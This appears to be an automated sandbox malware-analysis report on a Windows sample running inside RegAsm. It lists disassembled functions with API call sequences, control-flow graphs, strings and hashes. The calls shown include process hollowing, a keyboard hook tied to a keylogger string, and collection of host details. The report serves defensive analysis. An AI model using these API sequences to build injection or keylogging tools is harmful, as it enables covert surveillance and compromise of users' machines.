                                                                • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                                • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                                Function 0041812A Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc Wow64GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b Wow64SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                                • NtClose.NTDLL(?), ref: 00418332
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                • ResumeThread.KERNEL32(?), ref: 00418470
                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                • NtClose.NTDLL(?), ref: 004184A3
                                                                • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                • GetLastError.KERNEL32 ref: 004184B5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                • API String ID: 3150337530-3035715614
                                                                • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59
                                                                Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1638 40a2f3-40a30a 1639 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1638->1639 1640 40a36e-40a37e GetMessageA 1638->1640 1639->1640 1643 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1639->1643 1641 40a380-40a398 TranslateMessage DispatchMessageA 1640->1641 1642 40a39a 1640->1642 1641->1640 1641->1642 1644 40a39c-40a3a1 1642->1644 1643->1644
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                • GetLastError.KERNEL32 ref: 0040A328
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                • TranslateMessage.USER32(?), ref: 0040A385
                                                                • DispatchMessageA.USER32(?), ref: 0040A390
                                                                Strings
                                                                • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                • String ID: Keylogger initialization failure: error
                                                                • API String ID: 3219506041-952744263
                                                                • Opcode ID: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                • Opcode Fuzzy Hash: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                                Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1655 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1662 10001177-1000119e lstrlenW FindFirstFileW 1655->1662 1663 10001168-10001172 lstrlenW 1655->1663 1664 100011a0-100011a8 1662->1664 1665 100011e1-100011e9 1662->1665 1663->1662 1666 100011c7-100011d8 FindNextFileW 1664->1666 1667 100011aa-100011c4 call 10001000 1664->1667 1666->1664 1669 100011da-100011db FindClose 1666->1669 1667->1666 1669->1665
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                • String ID:
                                                                • API String ID: 1083526818-0
                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                Function 00411D39 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                • String ID:
                                                                • API String ID: 3950776272-0
                                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                • String ID: 5.1.1 Pro$override$pth_unenc
                                                                • API String ID: 2281282204-2344886030
                                                                • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                Strings
                                                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Create$EventLocalThreadTime
                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                • API String ID: 2532271599-1507639952
                                                                • Opcode ID: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                • Opcode Fuzzy Hash: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,013DD540), ref: 004338DA
                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 1815803762-0
                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                Function 0041B69E Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Name$ComputerUser
                                                                • String ID:
                                                                • API String ID: 4229901323-0
                                                                • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                Function 0040EA00 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 79->80 98 40ec27-40ec3d call 401fab call 4139e4 79->98 88 40ec47-40ec49 80->88 89 40ec4e-40ec55 80->89 92 40ef2c 88->92 93 40ec57 89->93 94 40ec59-40ec65 call 41b354 89->94 92->49 93->94 104 40ec67-40ec69 94->104 105 40ec6e-40ec72 94->105 98->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->126 104->105 108 40ecb1-40ecc4 call 401e65 call 401fab 105->108 109 40ec74 call 407751 105->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 118 40ec79-40ec7b 109->118 121 40ec87-40ec9a call 401e65 call 401fab 118->121 122 40ec7d-40ec82 call 407773 call 40729b 118->122 121->108 141 40ec9c-40eca2 121->141 122->121 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 147 40ecac call 40729b 144->147 147->108 177->178 203 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->203 179 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->179 180 40edc5-40edcc 178->180 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 179->234 182 40ee4a-40ee54 call 409092 180->182 183 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 180->183 193 40ee59-40ee7d call 40247c call 434829 182->193 183->193 210 40ee8c 193->210 211 40ee7f-40ee8a call 436f10 193->211 203->178 217 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 210->217 211->217 271 40eede-40ef03 call 434832 call 401e65 call 40b9f8 217->271 286 40f017-40f019 234->286 287 40effc 234->287 271->234 288 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 271->288 290 40f01b-40f01d 286->290 291 40f01f 286->291 289 40effe-40f015 call 41ce2c CreateThread 287->289 288->234 306 40ef2a 288->306 294 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 289->294 290->289 291->294 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 294->344 345 40f13c 294->345 306->92 347 40f13e-40f156 call 401e65 call 401fab 344->347 345->347 356 40f194-40f1a7 call 401e65 call 401fab 347->356 357 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 347->357 367 40f207-40f21a call 401e65 call 401fab 356->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 356->368 357->356 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 400 40f27b-40f27c SetProcessDEPPolicy 379->400 401 40f27e-40f291 CreateThread 379->401 380->379 400->401 404 40f293-40f29d CreateThread 401->404 405 40f29f-40f2a6 401->405 404->405 408 40f2b4-40f2bb 405->408 409 40f2a8-40f2b2 CreateThread 405->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 415 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->415 416 40f2c2-40f2c7 413->416 417 40f307-40f31a call 401fab call 41353a 413->417 415->417 416->415 426 40f31f-40f322 417->426 426->157 428 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 426->428 443 40f381-40f386 DeleteFileW 428->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                APIs
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
